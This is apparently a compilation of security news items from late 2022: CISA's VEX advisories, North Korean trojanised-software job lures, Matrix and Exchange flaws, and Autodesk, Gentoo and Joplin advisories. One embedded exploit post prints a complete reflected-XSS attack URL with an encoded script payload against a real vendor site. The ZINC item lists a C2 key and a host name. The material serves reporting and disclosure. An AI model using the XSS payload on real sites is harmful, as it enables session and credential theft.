‘SBOM turns on flashing lights on the dashboard; VEX helps you figure out which to turn off’

‘SBOM turns on flashing lights on the dashboard; VEX helps you figure out which to turn off’

A new twist on security advisories promises to optimize the triaging of vulnerabilities by highlighting whether flaws are not just present within software but practically exploitable, too.

Developed by the US government, the vulnerability exploitability exchange (VEX) enables “both suppliers and users to focus on vulnerabilities that pose the most immediate risk” and avoid wasting time on bugs with no impact, according to use cases (PDF) published by the US Cybersecurity & Infrastructure Security Agency (CISA) in April 2022.

RECOMMENDED Patching common vulnerabilities at scale: project promises bulk pull requests

As CISA vulnerability analyst Justin Murphy puts it: if a software bill of materials (SBOM) “turns on flashing lights on the dashboard, VEX helps you figure out which ones you have to turn off”.

Speaking at the recent Linux Security Summit in Dublin, Ireland, Murphy said this “negative security advisory” supplements the provision of a product’s ‘ingredients’ by SBOMs, which President Biden has decreed should be a precondition for the government purchase of software.

**Vulnerable\_code\_not\_in\_execute\_path**

VEX advisories, which emerged from a National Telecommunications and Information Administration (NTIA) project, advise whether a product is ‘affected’, ‘not affected’, ‘fixed’, or ‘under investigation’ in relation to a particular bug.

As detailed (PDF) by CISA, the ‘not affected’ designation could be accompanied by ‘status justifications’ such as:

*   Component\_not\_present
*   Vulnerable\_code\_not\_present
*   Vulnerable\_code\_cannot\_be\_controlled\_by\_adversary
*   Vulnerable\_code\_not\_in\_execute\_path
*   Inline\_mitigations\_already\_exist

Murphy suggested a specific scenario in which “you have a third-party dependency and it says the code is vulnerable, but since the compiler rips it out you’re not actually affected”. Alternatively, he continued, a product might use a vulnerable library but not its vulnerable functions, or contain protections around input validation.

In providing information about exploitability, suggested Murphy, VEX advisories usefully augment SBOMs and the Known Exploited Vulnerability Catalog, which CISA launched in the fall of 2021.

**Machine readability**

The proliferation of CVEs and therefore security advisories has made tackling known vulnerabilities a “data management problem”, said Murphy.

And the problem is complicated by the fact advisories come in various formats, hampering not just machine readability but also “human readability in some cases”.

Asking the maintainer about flaws – “will you even get a response?” – or conducting your own, time-consuming investigation are hardly superior alternatives, argued Murphy.

This context helps explain CISA’s focus on interoperability and the fact VEX advisories can be implemented in the machine-readable OASIS CSAF standard.

**Name confusion**

Aspirations to link SBOM and VEX data are complicated by the lack of a universally agreed upon system of common identifiers for software components, conceded Murphy.

As such, security teams are at risk of erroneously misunderstanding their stack’s exposure when, for example, separate SBOMs inadvertently use differing identifiers for the same component or the same identifier for different components.

A comprehensive component identification system probably needs to address this problem “through aliases or equivalency relationships”, suggested Murphy, perhaps using a combination of common platform enumeration (CPE), package URLs (purls), SWID tags, SWHIDS, and GitBOM.

DON’T MISS Microsoft confirms zero-day exploits against Exchange Server in ‘limited’ attacks

The exploitability advisory: CISA’s VEX offers fresh take on tackling known vulnerabilities

Joomla KSAdvertiser extension version 2.5.37 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Heiner Klostermann - kiss-software.de                                      ││  Software : Joomla KSAdvertiser 2.5.37                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'fSpS' is vulnerable to XSShttps://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en[-] Done

Posted: October 5, 2022 by

Microsoft researchers are warning of fake job offers where the only actual compensation available is a golden handshake of malware and trickery. The campaign targets those with technical know-how because, despite what some may think, scams are for everybody, not just people unfamiliar with tech. With the right tactics and messaging, anyone is a potential target.

**A focused target list**

The attack targets people working in defence, media careers, aerospace, and IT services. You know, the kind of people who might have access confidential information, sensitive data, journalists, important passwords etc.

The danger here is not simply the initial compromise, but where it can lead. With access to a compromised system attackers have a bridgehead they can use to move into networks, exposing servers, databases, mailboxes, you name it. The starting and ending points for any given attack would be quite different, beginning in one industry and ending in another.

**How the attack works**

Microsoft attributes the attacks to a state-sponsored group it calls ZINC, which operates from North Korea. This group is all about theft and espionage, so the target list up above makes sense.

The way the attacks work tends to follow a similar pattern:

1.  Bogus LinkedIn profiles claiming to be recruiters in the US, UK, and India, scouting for talent. Potential victims are enticed into applying for non-existent posts at genuine companies.
    
2.  Victims are sent tampered versions of open-source software, away from LinkedIn. It’s the classic “move the victim away from the potential safety of the starting point” technique. MSFT researchers claim to have seen “at least” five methods of delivering infected applications to would-be job applicants.
    
3.  Tampered software includes KiTTY and PuTTY, both of which are popular secure shell (SSH) clients used for remote administration of computers. There’s also TightVNC, muPDF/Subliminal Recording, and Sumatra PDF Reader.
    
4.  The compromised software works in similar, but different ways. In order to avoid detection the software may require certain conditions to be met. For example, MSFT research mentions that weaponised copies of TightVNC Viewer will only install a backdoor when it's used to connect to particular host.
    
5.  Infected machines connect to a command and control (C2) server, used to monitor, issue commands, and install additional malware as and when it's needed.
    

**Bogus jobs: An endless scourge**

Fake job offers are a perennial favourite of malware slingers everywhere. Scammers don't have to guess what would-be job applicants want, so targeting them is easy, and applicants may be more willing to lower their guard, and may be less likely to alert HR or security about suspicious activity.

For example: If someone sends an employee a dubious PDF attachment they have no reason not to report it if they think it might be malicious. On the other hand, if an employee is looking for another job and someone sends them a bogus job offer or interview request, will they want to alert security about it and reveal that they're thinking of leaving the company?

This is why it’s essential to spot the flaws in job offers which sound too good to be true. As many of these attacks ride the coat-tails of legitimate businesses, the ball is actually in the victim’s court. Find the employment details for the business in question, and approach the organisation directly. If the supposed offer is bogus, you’ll know right away and can safely delete any and all rogue correspondence. Who knows, your enquiring nature may even makes yours a name a theoretical future employer may remember!

**RELATED ARTICLES**

Bogus job offers hide trojanised open-source software

Confidentiality and authentication flaws uncovered by researchers

Emma Woollacott 04 October 2022 at 14:49 UTC  
Updated: 04 October 2022 at 16:00 UTC

Confidentiality and authentication flaws uncovered by researchers

Matrix has patched five serious vulnerabilities in its end-to-end encryption that break the confidentiality and authentication of messages.

The flaws would allow a malicious server to read user messages and impersonate devices.

Matrix currently has 69 million accounts in total, spread over around 100,000 servers. The technology provides a federated communication protocol, allowing clients with accounts on different Matrix servers – their homeservers – to exchange messages across the entire ecosystem.

The platform enables end-to-end encryption by default.

However, four researchers – Martin Albrecht of the Royal Holloway, University of London, Sofía Celi of Brave Software, Benjamin Dowling of the University of Sheffield, and Daniel Jones of the University of London – have demonstrated (PDF) five practically-exploitable flaws.

**Fairly straightforward**

The vulnerabilities, two of which are rated critical, undermine assurances of authentication and confidentiality normally offered by the Matrix platform.

"All our attacks require a malicious homeserver – the server where users create accounts – i.e., no external party could mount them because all Matrix communication between clients and servers and between servers for federation are protected by TLS," Albrecht told The Daily Swig.

Catch up with the latest encryption-related news and analysis

"Now, for a malicious homeserver, carrying out these attacks would have been easy. We have implemented proof-of-concept attacks for the vulnerabilities we reported, and these \[are\] usually fairly straightforward."

The first critical vulnerability, CVE-2022-39250, is key/device identifier confusion in SAS verification, a bug in matrix-js-sdk that confuses device IDs and cross-signing keys. “This could be exploited by a malicious server admin to break emoji-based verification when cross-signing is in use, authenticating themselves rather than the target user,” according to a security notice by the developers of Matrix.

The other critically-rate flaw, CVE-2022-39251, is a protocol-confusion bug that incorrectly accepts to-device messages encrypted by Megolm rather than Olm, attributing them to the Megolm sender rather than the actual sender. The vulnerability potentially allows an attacker to send fake keys in order to spoof historical messages from other users.

In addition, the flaw creates a means to add a malicious key backup to a user’s account in order to exfiltrate message keys. Matrix’s developers said this attack scenario, which would require certain unusual preconditions, has not been detected in the wild.

**Impersonation attack**

Meanwhile, a semi-trusted impersonation attack exploits a lack of verification in Element in order to send attacker-controlled Megolm sessions to a target device, falsely posing as a session of the device they wish to impersonate.

Another vulnerability allows a malicious homeserver to add users under their control to end-to-end encrypted rooms – where they can then decrypt future messages sent in the room. This happens because room management messages aren’t authenticated in the Matrix specification, meaning they can be faked by a rogue homeserver.

Lastly Matrix’s use of AES-CTR to encrypt attachments, secrets, and symmetric key backups was faulted for lacking cryptographical rigour. Not good but, as the researchers acknowledge, this IND-CCA break falls short of anything that would result in a practical attack.

The researchers conclude that some of the vulnerabilities reside in the Matrix protocol itself, saying that they highlight the need for a systematic and formal analysis of the cryptography in the Matrix standard.

**Enter the Matrix**

However, the developers of Matrix dispute this.

"We consider the protocol itself to be sound and our security processes to be robust," Matthew Hodgson, co-founder and project lead for Matrix and CEO/CTO at Element, told The Daily Swig.

"For instance, we’re currently in the middle of a series of public, independent audits of our next-gen SDKs \[software development kits\] from Least Authority, and it’s worth noting that our next-gen implementations are not vulnerable to the implementation bugs in question here."

Albrecht responded: "The Matrix developers have shared with us their plans for addressing the issues we argued about, so we are hopeful that eventually the right outcome – Matrix achieving the security guarantees that it promises – will be achieved."

Element offers the flagship client and prototype implementation of Matrix.

RELATED Let’s Encrypt builds infrastructure to support browser-based certificate revocation revival

Matrix address flaws that break message encryption assurances

Parsing a maliciously crafted X_B file can force Autodesk AutoCAD 2023 and 2022 to read beyond allocated boundaries. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.

**Summary**

Multiple Autodesk AutoCAD and AutoCAD-based products have been affected by Out-of-bound Read, Out-of-bound Write, Use of Uninitialized Variable, Heap based Buffer Overflow, and Memory Corruption vulnerabilities.

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2022-33884 - Parsing a maliciously crafted X\_B file can force Autodesk AutoCAD 2023 and 2022 to read beyond allocated boundaries. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.

2) CVE-2022-33885 - A maliciously crafted X\_B, CATIA, and PDF file when parsed through Autodesk AutoCAD 2023 and 2022 can be used to write beyond the allocated buffer. This vulnerability can lead to arbitrary code execution.

3) CVE-2022-33886 - A maliciously crafted MODEL and SLDPRT file can be used to write beyond the allocated buffer while parsing through Autodesk AutoCAD 2023 and 2022. The vulnerability exists because the application fails to handle crafted MODEL and SLDPRT files, which causes an unhandled exception. An attacker can leverage this vulnerability to execute arbitrary code.

4) CVE-2022-33887 - A maliciously crafted PDF file when parsed through Autodesk AutoCAD 2023 causes an unhandled exception. An attacker can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code in the context of the current process.

5) CVE-2022-33888 - A malicious crafted Dwg2Spd file when processed through Autodesk DWG application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions**

**Update Source**

Autodesk® AutoCAD®

2023, 2022

2023.1.1, 2022.1.3

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Architecture

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Electrical

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Map 3D

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mechanical

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® MEP

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Plant 3D

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® LT

2023, 2022

2023.1.1, 2022.1.3

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D®

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2023, 2022

2023.1.1, 2022.1.3\*\*

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change._

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk strongly recommends users of the 2022 and 2023 versions of Autodesk® Advance Steel, Autodesk® Civil 3D®, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above to install the latest AutoCAD® or AutoCAD LT 2023 and 2022 updates, as applicable, via the Autodesk Desktop App or the Accounts Portal.

Customers using previous versions that no longer qualify for full support should plan to upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   Anonymous working with Trend Micro Zero Day Initiative for reporting CVE-2022-33884, CVE-2022-33885, CVE-2022-33887
*   Tran Van Khang - khangkito (VinCSS) working with Trend Micro Zero Day Initiative for reporting CVE-2022-33886
*   Kushal Arvind Shah of Fortinet's FortiGuard Labs for reporting CVE-2022-33888

**Revision History**

**Revision**

**Date**

**Description**

1.0

9/22/2022

Initial Release of the Security Advisory

_Disclaimer_

_ANY AND ALL INFORMATION, CONTENT AND MATERIALS IN THIS DOCUMENT AND ANY PRODUCTS, SERVICES OR GRAPHICS PROVIDED BY OR OBTAINED THROUGH THIS SITE (INCLUDING WITHOUT LIMITATION ANY THIRD PARTY PRODUCTS AND SERVICES) ARE PROVIDED “AS IS” AT YOUR OWN RISK AND WITHOUT ANY WARRANTIES. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

CVE-2022-33884: Security Advisories | Autodesk Trust Center

‘ProxyNotShell’ abuse less severe than 2021 attack wave due to authentication requirement

‘ProxyNotShell’ abuse less severe than 2021 attack wave due to authentication requirement

Microsoft is developing a patch for two actively exploited zero-day vulnerabilities in Microsoft Exchange Server.

The flaws, tracked as CVE-2022-41040 and CVE-2022-41082, were discovered in Microsoft’s enterprise mail server by Vietnamese cybersecurity firm GTSC. Microsoft said it is aware of “a small number of targeted attacks” exploiting the flaws, which impact on-prem Microsoft Exchange Server versions 2013, 2016, and 2019.

The bugs appear to be less dangerous variants – on account of authentication to PowerShell being required – of the critical ProxyShell vulnerabilities that were widely abused in 2021.

**RCE chain**

In GTSC's original security advisory, researchers said they discovered an attack on “critical” infrastructure made through Exchange Server in August.

The first vulnerability, CVE-2022-41040 (CVSS 8.8), is a server-side request forgery (SSRF) issue. When triggered remotely to launch CVE-2022-41082 (CVSS 6.3), the bug could result in remote code execution (RCE).

Catch up of the latest enterprise security news

As the vulnerabilities are yet to be patched, the full technical details have not been released – but proof-of-concept (PoC) code is expected to appear soon.

GTSC informed Trend Micro’s Zero Day Initiative (ZDI) of its findings. After ZDI verified the flaws and reached out to the Microsoft Security Response Center (MSRC), the Redmond giant confirmed the report and published an analysis of attacks exploiting the flaws.

“Authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately,” Microsoft noted.

Unfortunately, the authentication required is nothing more than a standard user. As a result, cybercriminals could obtain these credentials via theft, credential stuffing, and brute-force attacks.

**State-sponsored attacks**

According to Microsoft, fewer than 10 organizations worldwide have been targeted by what is likely a “state-sponsored organization”.

GTSC researchers said there are indicators that a Chinese threat group is leveraging Antsword, a Chinese cross-platform website management suite with web shell functionality.

China Chopper, a web shell, has apparently been used to perform Active Directory reconnaissance and data exfiltration. If this sounds familiar, the same web shell was used in attacks exploiting Exchange Server zero-day vulnerabilities in 2021. These attacks were attributed to the state-sponsored Chinese threat group HAFNIUM.

BACKGROUND ‘A whole new attack surface’ – Researcher Orange Tsai documents ProxyLogon exploits against Microsoft Exchange Server

Security researcher Kevin Beaumont has noted similarities between the paths used by the new bugs, which he has dubbed ‘ProxyNotShell’, and the zero days from last year.

Devcore researcher Orange Tsai, who discovered the original, ProxyShell flaws, suggested in a talk at Black Hat USA (PDF) last year that fundamental path confusion issues could see further ProxyShell variants emerge – a prediction that has now come to pass.

**Mitigation advice**

Microsoft has released customer guidance for mitigating the new bugs while it works on a patch.

The company is urging customers to disable remote PowerShell access for non-administrators immediately. If the Exchange Emergency Mitigation Service (EEMS) is enabled, further mitigations will be applied automatically.

According to the tech giant, Exchange Online customers do not need to take any action. However, Beaumont has queried the wisdom of this statement, given that Microsoft Exchange Online migration involves using hybrid, internet-facing Exchange servers.

“It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available,” Microsoft commented.

CISA has added the two zero-days to the Known Exploited Vulnerabilities Catalog.

Microsoft told The Daily Swig that the company has nothing further to share beyond the published advisories.

YOU MIGHT ALSO LIKE #AttachMe Oracle cloud bug exposed volumes to data theft, hijack

Microsoft confirms zero-day exploits against Exchange Server in ‘limited’ attacks

By Waqas
The hacker group is called ZINC, and its primary targets are organizations in the aerospace, media, IT services, and defense sectors.
This is a post from HackRead.com Read the original post: NK Hackers Lacing Legit Software with Malware

Microsoft threat hunters discovered a new phishing campaign launched by a North Korean government-backed hacking group involving the use of weaponized open-source software. The malware is laced with extensive capabilities, including data theft, spying, network disruption, and financial gains.

**Well-known Software Used in Phishing Campaign**

In the new campaign, hackers are weaponizing famous open-source software, and their primary targets are organizations in the aerospace, media, IT services, and defense sectors.

In its report published on Thursday, Microsoft stated that the hackers are a sub-division of the notorious Lazarus hacking group called ZINC. This group has injected encrypted code in several open-source apps, including KiTTY, Sumatra PDF Reader, PuTTY, and muPDF/Subliminal Recording software installers, eventually leading to espionage malware being installed as ZetaNile.

For your information, ZINC is the same group that successfully conducted the highly destructive Sony Pictures Entertainment compromise in 2014.

**LinkedIn Abused to Lure Targets**

The researchers have referred to the attackers as highly dangerous, operational, and sophisticated nation-state actors abusing the LinkedIn networking portal to hunt for targets. The crooks use the network to connect and befriend employees of their selected organizations. Their targets are based in India, Russia, the UK, and the USA.

The campaign started in June 2022, whereby ZINC used conventional social engineering tactics to search and connect with individuals and gain their trust before switching the conversation to WhatsApp. Once this is achieved, they deliver the malicious payloads.

LinkedIn’s threat prevention and defense team confirmed detecting fake profiles created by North Korean actors impersonating recruiters working at prominent media, defense, and tech firms. They want to lure targets away from LinkedIn and move them to WhatsApp.

It is worth noting that LinkedIn is owned by Microsoft Corporation since 2016.

One of the fraudulent recruiter profiles on Linkedin used in the campaign (Image: Microsoft)

**Attach Methodology Explained**

According to a joint blog post by Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense, the trojanized KiTTY and PuTTY apps use an intelligent tactic to ensure that only selected targets are infected with malware and not others.

To achieve this, the app installers don’t execute malicious code. The malware is installed only when the apps connect to a particular IP address and use login credentials given to the targets by fake recruiters.

The threat actors also use DLL search order hijacking to load and decrypt a second-stage payload when this key 0CE1241A44557AA438F27BC6D4ACA246 is presented for command and control.

Additional malware is installed when the connection is established with the C2 server. Both apps work in the same manner. Similarly, TightVNC Viewer installs the final payload after the user selects ec2-aet-tech.w-adaamazonaws from a dropdown menu of remote hosts in the app.

Microsoft is urging the cybersecurity community to pay attention to this threat, given its extensive usage and use of legit software products. Moreover, it threatens users and organizations across multiple regions and sectors.

**More NK Hackers News**

1.  North Korean Hackers Posing as IT Workers
2.  How Bad is the North Korean Cyber Threat?
3.  NK hackers stole $1.7B from crypto exchanges
4.  Lazarus using AppleJeus MacOS malware for crypto
5.  LAZARUS Using TraderTraitor Malware to Target Blockchain

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

NK Hackers Lacing Legit Software with Malware

Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file, via Joplin. This is possible because the application does not properly validate the schema/protocol of existing links in the markdown file before passing them to the 'shell.openExternal' function.

CVE-2022-40277: GitHub - laurent22/joplin: Joplin - an open source note taking and to-do application with synchronisation capabilities for Windows, macOS, Linux, Android and iOS.

Gentoo Linux Security Advisory 202209-21 - A vulnerability has been discovered in Poppler which could allow for arbitrary code execution. Versions less than 22.09.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Poppler: Arbitrary Code Execution  
     Date: September 29, 2022  
     Bugs: #867958  
       ID: 202209-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in Poppler which could allow for  
arbitrary code execution.

Background  
=========  
Poppler is a PDF rendering library based on the xpdf-3.0 code base.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-text/poppler           < 22.09.0                  >= 22.09.0

Description  
==========  
Multiple vulnerabilities have been discovered in Poppler. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Processing a specially crafted PDF file or JBIG2 image could lead to a  
crash or the execution of arbitrary code.

Workaround  
=========  
Avoid opening untrusted PDFs.

Resolution  
=========  
All Poppler users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/poppler-22.09.0"

References  
=========  
[ 1 ] CVE-2021-30860  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30860  
[ 2 ] CVE-2022-38784  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38784

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-21

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-21

The SolarMarker group is exploiting a vulnerable WordPress-run website to encourage victims to download fake Chrome browser updates, part of a new tactic in its watering-hole attacks.

Researchers have discovered the cyberattack group behind the SolarMarker malware targeting a global tax consulting organization with a presence in the US, Canada, the UK, and Europe, which is using fake Chrome browser updates as part of watering hole attacks.  

It's a new approach for the group, replacing its previous method of search engine optimization (SEO) poisoning, also known as spamdexing.

SolarMarker is multistage malware which can exfiltrate autofill data, saved passwords, and saved credit card information from victims' Web browsers.

**Preparation for a Wider Attack?**

According to an advisory published by eSentire's Threat Response Unit (TRU) on Friday, the threat group was seen exploiting weaknesses in a medical equipment manufacturer's website, which was built with the popular open source content management system WordPress.

The victim was an employee of a tax consulting organization and searched for the manufacturer by name on Google.

"This tricked the employee into downloading and executing SolarMarker, which was disguised as a Chrome update," the advisory noted.

"The fake browser update overlay design is based on what browser the victim is utilizing while visiting the infected website," the advisory added. "Besides Chrome, the user might also receive the fake Firefox or Edge update PHP page."

It is unclear whether the SolarMarker group is testing new tactics or preparing for a wider campaign, given that the TRU team has only observed a single infection of this vector type — previous SolarMarker attacks used SEO poisoning to hit people who searched online for free templates of popular business documents and business forms.

**Monitor Endpoints, Raise Employee Awareness**

The TRU advisory outlines four key steps organizations can take to reduce the impact of these kinds of attacks, including raising employee awareness regarding browser updates that occur automatically, and avoiding downloading files from unknown sites.

"Threat actors research the kind of documents businesses look for and try to get in front of them with SEO," the advisory stated. "Only use trusted sources when downloading content from the internet, and avoid free and bundled software."

The advisory also recommended more vigilant endpoint monitoring, which TRU adds will require more frequent rule updates to detect the latest campaigns, as well as enhanced threat-landscape monitoring to bolster the organization's overall defense posture.

**SolarMarker Campaigns Back After Dormant Period**

The .NET malware was first discovered in 2020 and is typically spread via a PowerShell installer, with information-gathering capabilities and a backdoor.

In October 2021, Sophos Labs observed a number of active SolarMarker campaigns that followed a common pattern: using SEO techniques, the cybercriminals managed to place links to websites with Trojanized content in the search results of several search engines.

A previous SolarMarker campaign reported by Menlo Security in October 2021 used more than 2,000 unique search terms, luring users to sites that then dropped malicious PDFs rigged with backdoors.

Tag

#pdf